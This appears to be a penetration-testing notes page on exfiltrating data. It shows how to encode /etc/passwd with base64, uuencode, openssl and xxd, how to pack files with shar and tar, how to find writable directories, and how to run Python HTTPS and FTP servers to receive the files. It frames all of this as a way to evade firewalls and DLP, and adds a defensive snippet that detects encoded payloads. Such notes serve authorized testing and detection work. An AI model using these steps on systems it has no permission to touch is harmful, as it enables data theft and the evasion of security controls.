Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Not much here yet...please feel free to contribute at my GitHub page.
The first step to exfiltration is to avoid being caught. This means avoiding firewalls, data loss prevention, email filters, and more. Encoding/encrypting your payload is a good way to do this.
Preparing files for transport
Base64 encode a file
base64 -w0 $file
Base64 decode a file
base64 -d $file
Binary files transfer badly over a terminal connection. There are many ways to convert a binary into base64 or a similar printable form and make the file terminal-friendly. We can then use a technique described further on to transfer a file to and from a remote system using nothing but the shell/terminal as the transport medium (i.e. no separate connection).
Encode:
$ uuencode /etc/passwd passwd-COPY
begin 644 passwd-COPY
356)U;G1U(#$X+C`T+C(@3%13"@``
`
end
Cut & paste the output (4 lines, starting with 'begin 644 filename') into uudecode to decode:
$ uudecode
begin 644 passwd-COPY
356)U;G1U(#$X+C`T+C(@3%13"@``
`
end
OpenSSL can also be used to encode files for transport.
Encode:
$ openssl base64 < /etc/passwd
Cut & paste the output then transfer and decode:
$ openssl base64 -d > passwd-COPY
You can also use xxd to hex-encode files.
First encode with this command:
$ xxd -p < /etc/passwd
Cut & paste the output into this command to decode:
$ xxd -p -r > passwd-COPY
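The three encodings above (base64 -w0, uuencode and xxd -p) reproduced in Python, as an added example that is not part of the original notes: each function mirrors the tool's line format, the round trip is checked with a SHA-256 digest so that a line lost during cut & paste is caught instead of silently producing a corrupt file, and a small detector flags transcript lines with those shapes, which is what a DLP or session-recording rule keys on. The SAMPLE bytes and TRANSCRIPT are constructed, and all function names are my own.

```python
import base64
import binascii
import hashlib
import re

# Constructed sample: bytes that do not survive a raw terminal (CR, ESC, NUL, 0x80 and up).
SAMPLE = bytes(range(256)) + b"\r\n\x1b[0m\x00end\n"


def sha256_hex(data: bytes) -> str:
    """Digest recorded by the sender before encoding and compared by the receiver after decoding."""
    return hashlib.sha256(data).hexdigest()


def encode_for_terminal(data: bytes, scheme: str) -> str:
    """Produce printable text in the same layout as `base64 -w0`, `uuencode` or `xxd -p`."""
    if scheme == "base64":
        return base64.b64encode(data).decode("ascii") + "\n"
    if scheme == "uu":
        # uuencode layout: 'begin <mode> <name>', 45-byte data lines, a lone '`', then 'end'
        lines = ["begin 644 payload"]
        for i in range(0, len(data), 45):
            chunk = binascii.b2a_uu(data[i:i + 45], backtick=True)
            lines.append(chunk.decode("ascii").rstrip("\n"))
        lines += ["`", "end"]
        return "\n".join(lines) + "\n"
    if scheme == "hex":
        digits = data.hex()
        # xxd -p wraps its output at 60 hex digits (30 bytes) per line
        return "\n".join(digits[i:i + 60] for i in range(0, len(digits), 60)) + "\n"
    raise ValueError(f"unknown scheme {scheme!r}")


def decode_from_terminal(text: str, scheme: str) -> bytes:
    """Inverse of encode_for_terminal; raises ValueError when the pasted block is structurally damaged."""
    if scheme == "base64":
        try:
            return base64.b64decode("".join(text.split()), validate=True)
        except binascii.Error as exc:
            raise ValueError(f"bad base64: {exc}") from exc
    if scheme == "uu":
        lines = text.splitlines()
        if len(lines) < 3 or not lines[0].startswith("begin ") or lines[-1] != "end":
            raise ValueError("uuencode block is missing its begin/end framing")
        out = bytearray()
        for line in lines[1:-1]:
            if line == "`":          # zero-length line terminates the data
                break
            out += binascii.a2b_uu(line)
        return bytes(out)
    if scheme == "hex":
        try:
            return bytes.fromhex("".join(text.split()))
        except ValueError as exc:
            raise ValueError(f"bad hex: {exc}") from exc
    raise ValueError(f"unknown scheme {scheme!r}")


def verified_round_trip(data: bytes, scheme: str, damage: bool = False) -> tuple[bool, str]:
    """Encode, optionally drop one line (a typical cut & paste accident), decode and compare digests."""
    expected = sha256_hex(data)
    text = encode_for_terminal(data, scheme)
    if damage:
        lines = text.splitlines(keepends=True)
        del lines[len(lines) // 2]   # lose a line from the middle of the paste
        text = "".join(lines)
    try:
        got = decode_from_terminal(text, scheme)
    except ValueError as exc:
        return False, f"decode failed: {exc}"
    if sha256_hex(got) != expected:
        return False, "digest mismatch: payload was altered or truncated"
    return True, expected


# Detection side: transcript lines whose shape matches a pasted encoded payload.
ENCODED_LINE = re.compile(
    r"^(?:begin \d{3} \S+"           # uuencode header
    r"|[A-Za-z0-9+/]{40,}={0,2}"      # long base64 run (base64 -w0 / openssl base64)
    r"|[0-9a-fA-F]{40,})$"            # long hex run (xxd -p)
)


def flag_encoded_lines(transcript: str) -> list[tuple[int, str]]:
    """Return (line number, scheme) for every transcript line that looks like an encoded payload."""
    hits = []
    for n, raw in enumerate(transcript.splitlines(), 1):
        line = raw.strip()
        if not ENCODED_LINE.match(line):
            continue
        if line.startswith("begin "):
            scheme = "uuencode"
        elif re.fullmatch(r"[0-9a-fA-F]+", line):
            scheme = "hex"
        else:
            scheme = "base64"
        hits.append((n, scheme))
    return hits


# Constructed transcript (not a real capture): ordinary commands with an encoded blob pasted in.
TRANSCRIPT = "\n".join([
    "$ ls -la /tmp",
    "$ base64 -w0 notes.bin",
    encode_for_terminal(b"x" * 40, "base64").strip(),
    "$ uudecode",
    "begin 644 passwd-COPY",
    "$ exit",
])

if __name__ == "__main__":
    for scheme in ("base64", "uu", "hex"):
        print(scheme, verified_round_trip(SAMPLE, scheme)[0],
              verified_round_trip(SAMPLE, scheme, damage=True)[1])
    print(flag_encoded_lines(TRANSCRIPT))
```

The damage path is what matters in practice: with base64 -w0 a lost character makes the decoder reject the input outright, while a lost line in uuencode or hex output decodes "successfully" to a shorter file, so only the digest comparison tells you the copy is bad.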
shar
Use shar to create a self-extracting shell script, which is in text format and can be copied/mailed:
Transfer exfil.shar to the remote system by any means and execute it:
chmod +x exfil.shar
./exfil.shar
tar
A tar file is similar to a standard zip archive; gzip it and base64-encode the stream so it survives a terminal:
tar cfz - *.py *.c | openssl base64 > exfil.tgz.b64
Transfer exfil.tgz.b64 to the remote system and decode:
openssl base64 -d < exfil.tgz.b64 | tar xfz -
HTTP/HTTPS
One of the easier ways to transfer a file as most devices have web access. Start by finding a directory on the target that you can write to.
# find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
# wget http://<url> -O url.txt -o /dev/null
curl has the benefit of being able to transfer with IMAP, POP3, SCP, SFTP, SMB, SMTP, TELNET, TFTP, and other protocols. Experimentation may be needed to figure out what is blocked/allowed by the firewall.
# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.pem with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python3 simple-https-server.py
# then in your browser, visit:
# https://localhost:443
import http.server
import ssl

# Python 3 names for the Python 2 BaseHTTPServer/SimpleHTTPServer modules used in the gist
httpd = http.server.HTTPServer(('0.0.0.0', 443), http.server.SimpleHTTPRequestHandler)
# ssl.wrap_socket() was removed in Python 3.12; an SSLContext does the same job
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='./server.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
FTP
Python FTP server
#!/usr/bin/env python3
#
# Author : Paranoid Ninja
# Modified: Zweilos
#
# Descr : Creates a Simple FTP Server in the tmp directory

from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer

FTP_PORT = 2121
FTP_USER = "ninja"
FTP_PASSWORD = "ninja"
FTP_DIRECTORY = "."


def main():
    ftp_directory = FTP_DIRECTORY
    answer = input("Run in the current directory? [y/n]\n")
    # the original tested (answer != "y") or (answer != "Y"), which is always true
    if answer not in ("y", "Y"):
        ftp_directory = input("Please enter a directory: ")

    # one user with full permissions: e=cd, l=list, r=retrieve, a=append,
    # d=delete, f=rename, m=mkdir, w=store
    authorizer = DummyAuthorizer()
    authorizer.add_user(FTP_USER, FTP_PASSWORD, ftp_directory, perm='elradfmw')

    handler = FTPHandler
    handler.authorizer = authorizer
    handler.banner = "Ninja FTP Server"

    address = ('', FTP_PORT)   # listen on all interfaces
    server = FTPServer(address, handler)
    server.max_cons = 256
    server.max_cons_per_ip = 5
    server.serve_forever()


if __name__ == '__main__':
    main()
You can also use the pyftpdlib module to quickly and easily set up FTP.